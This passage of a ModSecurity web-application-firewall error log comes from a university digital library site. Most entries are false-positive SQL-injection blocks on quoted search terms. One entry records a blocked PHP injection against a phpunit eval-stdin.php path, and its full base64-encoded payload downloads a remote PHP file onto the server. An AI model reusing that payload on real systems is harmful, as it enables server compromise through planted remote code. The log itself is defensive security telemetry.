"ZOxyIcCo-f0AALv7jIEAAAAD"]
[Mon Aug 28 17:23:07.742225 2023] [:error] [pid 48433] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Foreign ownership modes\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx1i8Co-f0AAL0xBdAAAAAG"]
[Mon Aug 28 17:24:02.494778 2023] [:error] [pid 48491] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Kamariah Najmi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx1wsCo-f0AAL1rhvQAAAAO"]
[Mon Aug 28 17:35:53.255366 2023] [:error] [pid 48694] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HENDRIKSEN, S. ELDON\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx4icCo-f0AAL42qIEAAAAQ"]
[Mon Aug 28 18:16:37.263012 2023] [:error] [pid 49434] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Accounting firm\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyCFcCo-f0AAMEaT6cAAAAG"]
[Mon Aug 28 18:21:34.684422 2023] [:error] [pid 49491] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Dyah Setyaningrum\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyDPsCo-f0AAMFTdmgAAAAK"]
[Mon Aug 28 18:42:27.899971 2023] [:error] [pid 49807] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HARAPAN, SYAFRI. SOPYAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyII8Co-f0AAMKPfJkAAAAU"]
[Mon Aug 28 19:01:28.100313 2023] [:error] [pid 50085] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Corporate growth\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyMmMCo-f0AAMOlGNoAAAAO"]
[Mon Aug 28 19:24:25.411135 2023] [:error] [pid 50626] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MARWOTO, HERU BAMBANG\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyR@cCo-f0AAMXCsUcAAAAE"]
[Mon Aug 28 19:34:06.186834 2023] [:error] [pid 50786] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Samara Neiva\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyUPsCo-f0AAMZiv3QAAAAD"]
[Mon Aug 28 20:12:34.065224 2023] [:error] [pid 51237] [client 103.195.58.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xhbmFuZ0FraXJhL09uaUNoYW4vbWFpbi9vb3BzLnBocCIsImF3ZXNhLnBocCIpKSB7CgllY2hvICJMYW5hbmdHYW50ZW5nIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8 ')); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWAS [hostname "digilibfeb.unla.ac.id"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZOydQsCo-f0AAMglSeIAAAAF"]
[Mon Aug 28 22:05:18.400507 2023] [:error] [pid 53319] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22The compromising consumer\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy3rsCo-f0AANBHWTAAAAAP"]
[Mon Aug 28 22:07:51.552606 2023] [:error] [pid 53325] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Value co-creation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy4R8Co-f0AANBNHtAAAAAV"]
[Mon Aug 28 22:13:31.390127 2023] [:error] [pid 53458] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Critical incident technique\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy5m8Co-f0AANDSC88AAAAR"]
[Mon Aug 28 22:21:13.566976 2023] [:error] [pid 53575] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Standardization\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy7acCo-f0AANFH-RUAAAAX"]
[Mon Aug 28 22:45:13.692537 2023] [:error] [pid 53683] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sini Nordberg-Davies\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzBCcCo-f0AANGzvwEAAAAY"]
[Mon Aug 28 22:49:41.411706 2023] [:error] [pid 53970] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Public sector\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzCFcCo-f0AANLSPbMAAAAF"]
[Tue Aug 29 02:25:14.872234 2023] [:error] [pid 57804] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Event marketing\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz0msCo-f0AAOHMvuEAAAAH"]
[Tue Aug 29 02:40:10.645781 2023] [:error] [pid 58041] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Value creation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz4GsCo-f0AAOK5UgsAAAAD"]
[Tue Aug 29 02:41:21.273603 2023] [:error] [pid 57470] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Middle managers\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz4YcCo-f0AAOB@d9wAAAAO"]
[Tue Aug 29 02:58:49.671788 2023] [:error] [pid 58184] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Buku Digital\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz8ecCo-f0AAONIPy0AAAAG"]
[Tue Aug 29 03:01:28.730523 2023] [:error] [pid 58184] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Audit committee chair\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz9GMCo-f0AAONIPzUAAAAG"]
[Tue Aug 29 05:40:05.217428 2023] [:error] [pid 59891] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Jurnal Manajemen Sumber Daya Manusia\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0iRcCo-f0AAOnzZIgAAAAB"]
[Tue Aug 29 05:52:01.612817 2023] [:error] [pid 60161] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Lu Chen\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0lEcCo-f0AAOsBbAcAAAAH"]
[Tue Aug 29 06:27:19.544389 2023] [:error] [pid 60552] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Value Transfer\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0tV8Co-f0AAOyI7MYAAAAE"]
[Tue Aug 29 08:16:25.705169 2023] [:error] [pid 62143] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Marketing performance measurement\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1G6cCo-f0AAPK-pc0AAAAD"]
[Tue Aug 29 08:26:14.318913 2023] [:error] [pid 62313] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Lian Kee Phua\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1JNsCo-f0AAPNpo9QAAAAE"]
[Tue Aug 29 08:53:59.181030 2023] [:error] [pid 62659] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Profitability\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1Pt8Co-f0AAPTD5BwAAAAE"]
